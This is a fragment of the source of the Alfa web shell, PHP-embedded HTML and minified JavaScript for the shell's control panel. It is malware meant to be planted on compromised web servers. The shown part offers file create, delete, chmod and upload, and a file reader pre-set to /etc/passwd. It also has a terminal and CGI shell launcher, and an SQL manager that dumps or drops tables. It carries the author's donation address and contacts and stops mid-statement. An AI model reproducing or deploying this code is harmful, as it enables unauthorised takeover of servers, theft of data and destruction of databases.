<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>
<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
<input type='hidden' name='ajax' value='true'>
<input type='hidden' name='alfa1' value='uploadFile'>
<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>
</tr>
</table>
</div>

<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>

<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>

<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
<div id='update-content'></div>
<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
<div id='rightclick_menu'>
 <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
 <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
 <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
 <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
 <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
 <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
</div>
<div id=\"filesman-tab-full-path\"></div>
<div id='alert-area' class='alert-area'></div>
<div class='cl-popup-fixed' style='display:none;'>
  <div id='shortcutMenu-holder'>
    <div class='popup-head'></div>
      <form autocomplete='off' onSubmit='return false;'>
        <label class='old-path-lbl'></label>
        <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
        <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
        <input type='text' name='fname'>
        <div class='perm-table-holder'>
          <table>
            <tbody>
             <tr>
               <td><b>Mode</b></td>
               <td>User</td>
               <td>Group</td>
               <td>World</td>
             </tr>
             <tr>
               <td>Read</td>
               <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
               <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
               <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
             </tr>
             <tr>
               <td>Write</td>
               <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
               <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
               <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
             </tr>
             <tr>
               <td>Execute</td>
               <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
               <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
               <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
             </tr>
             <tr>
               <td>Permission</td>
               <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
               <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
               <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
             </tr>
            </tbody>
          </table>
        </div>

      </form>
    <div class='popup-foot'>
      <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
      <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
    </div>
  </div>
</div>";?>
<script>
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var 